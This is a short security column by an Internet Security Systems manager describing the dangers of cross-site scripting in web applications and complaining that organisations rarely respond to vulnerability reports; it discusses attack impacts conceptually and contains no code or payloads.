Bug Watch: New threat from an old flaw

This week Gunter Ollmann, manager of X-Force Security Assessment Services at Internet Security Systems, warns of the dangers of cross-site scripting.

There is one class of vulnerability that appears to affect almost all dynamic web applications currently offering services over the internet.

Too many sites appear to be vulnerable to various forms of dynamic code insertion which, with a little forethought by an attacker, can be turned into a devastating exploit. The most dangerous of these is cross-site scripting (CSS).

While the potential problems and security risks associated with CSS vulnerabilities have been known for a number of years, it is only now that attackers have gained a sufficient understanding of the flaw to turn it into a serious delivery mechanism.

Organisations offering internet services have yet to fully understand how such an exploit could be used in an attack against their site.

The impact of a successful exploitation of a CSS vulnerability is dependant on the type of web application, the organisation's business offering, and the site's visitors.

Successful CSS attacks are related to an abuse of inherent trust. They have been used to harvest client Session IDs and hijack accounts; they have been used as a delivery mechanism for malicious code to the client browser (such as Trojans and key logging); and they have been used as a delivery mechanism for the execution of malicious code within the organisation.

The most successful attacks to date have been directed at the client browser. The attacker is able to use the CSS vulnerability to cause the organisation's web application to launch the attack at their own clients.

A creative attacker can thus target recent vulnerabilities in the browser being used to navigate the site, and may be able to compromise the security of the host system.

As far as the site visitor is concerned, a trusted organisation has attacked and compromised their security.

While I know of no legal test cases as to the culpability of the 'attacking' organisation, it would be fair to say that the success of the attack is due to the lack of security and integrity of the organisation's web application.

I have now picked up the habit of checking sites I visit often for potential CSS vulnerabilities. After all, I could be their next victim.

Unfortunately, almost all the dynamic sites I visit appear to be vulnerable to these CSS attacks. The most disturbing thing for me is the lack of response on the part of these organisations when they are informed of the vulnerability.

Most of the time there is no acknowledgement of having received the advice, and in only a handful of cases is there a reply, typically along the lines of 'we don't see this as a security risk'.

Only in the rarest of cases will the organisation be pleased that you have identified a security flaw with their web application, and make any effort to rectify the problem.

From past experience, I would guess that many organisations will only respond to the threat if it is likely that they will directly suffer from the flaw.

Perhaps it will take a test case to establish precedence or, more likely, the development of sites designed to 'name and shame' the offenders and direct their clients to safer areas.